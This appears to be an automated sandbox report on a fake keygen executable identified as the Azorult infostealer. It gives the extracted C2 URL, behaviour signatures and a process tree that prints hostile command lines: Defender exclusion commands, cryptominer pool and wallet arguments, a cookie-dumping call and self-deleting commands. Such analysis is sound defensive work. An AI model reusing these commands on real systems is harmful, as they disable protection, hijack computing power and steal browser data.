Analysis
-
max time kernel
24s -
max time network
62s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-03-2021 08:55
General
-
Target
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
-
Size
5.2MB
-
MD5
d6b33a9f8b1600caa8b7ac88240e59e1
-
SHA1
19007187f24b11f922ed5ad8717c9e06f6452654
-
SHA256
3ee83cca83729705feabd39c7fd07a9f9f9de6a1847eea6f7ac645a60a643f85
-
SHA512
b8df0dbe55c0ed32639bab7af0a38077338b36fb4e4832d49e542cac9838f6359d3d0764cba4fcaa90ebb486e27efa8a461fe0fe637a94d0fa626a63847fcc04
Score
10/10
Malware Config
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Executes dropped EXE 12 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 7 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
themida 1 IoCs
Detects Themida, Advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 61 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 1 3.1616748980.605da1b4ac07e 1016⤵
-
C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 2 3.1616748980.605da1b4ac07e7⤵
-
C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-59USJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-59USJ.tmp\Setup3310.tmp" /SL5="$30296,138429,56832,C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe" /Verysilent /subid=5779⤵
-
C:\Users\Admin\AppData\Local\Temp\is-E0879.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E0879.tmp\Setup.exe" /Verysilent10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe"C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6LE58.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-6LE58.tmp\vict.tmp" /SL5="$60196,870426,780800,C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe" /VERYSILENT /id=5359⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SMUPT.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-SMUPT.tmp\winhost.exe" 53510⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe"C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RCJCN.tmp\u4s2rqnzifk.tmp"C:\Users\Admin\AppData\Local\Temp\is-RCJCN.tmp\u4s2rqnzifk.tmp" /SL5="$20250,2592217,780800,C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JUVL0.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-JUVL0.tmp\winlthsth.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 51611⤵
- Program crash
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4tbtvai5rzt\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\4tbtvai5rzt\AwesomePoolU1.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe"C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6VME0.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-6VME0.tmp\vpn.tmp" /SL5="$50144,15170975,270336,C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe" /silent /subid=4829⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FB9K7.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-FB9K7.tmp\IBInstaller_97039.tmp" /SL5="$102F4,9918015,721408,C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-AB2Q3.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-AB2Q3.tmp\{app}\chrome_proxy.exe"10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fyjrenhktnk\fo0g5bodxtn.exe"C:\Users\Admin\AppData\Local\Temp\fyjrenhktnk\fo0g5bodxtn.exe" /quiet SILENT=1 AF=7568⤵
-
-
C:\Users\Admin\AppData\Local\Temp\lch4j0ncp42\j03dwlp0p5g.exe"C:\Users\Admin\AppData\Local\Temp\lch4j0ncp42\j03dwlp0p5g.exe" /1-6108⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Bold-Dust'9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\0slgfyk35fr\app.exe"C:\Users\Admin\AppData\Local\Temp\0slgfyk35fr\app.exe" /8-238⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Autumn-Violet'9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\dj4mefarcck\berjb4e0wuv.exe"C:\Users\Admin\AppData\Local\Temp\dj4mefarcck\berjb4e0wuv.exe" /ustwo INSTALL8⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-OBNE8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-OBNE8.tmp\setups.tmp" /SL5="$2020E,383902,148480,C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\EE2F.tmp.exe"C:\Users\Admin\AppData\Roaming\EE2F.tmp.exe"5⤵
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
-
-
-
C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
-
C:\ProgramData\25660.exe"C:\ProgramData\25660.exe"5⤵
-
-
C:\ProgramData\5479586.exe"C:\ProgramData\5479586.exe"5⤵
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
-
-
-
C:\ProgramData\3351577.exe"C:\ProgramData\3351577.exe"5⤵
-
-
C:\ProgramData\6235704.exe"C:\ProgramData\6235704.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
28KB
-
Filesize
8KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
108KB
-
Filesize
956KB
-
Filesize
4KB
-
Filesize
1.9MB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
5.5MB
-
Filesize
5.5MB
-
Filesize
728KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
276KB
-
Filesize
672KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
60KB
-
Filesize
38.0MB
-
Filesize
38.0MB
-
Filesize
52KB
-
Filesize
272KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
292KB
-
Filesize
292KB
-
Filesize
3.5MB
-
Filesize
3.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
136KB
-
Filesize
11.9MB
-
Filesize
104KB
-
Filesize
140KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
236KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
7.0MB
-
Filesize
7.0MB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
320KB
-
Filesize
4KB
-
Filesize
304KB
-
Filesize
6.9MB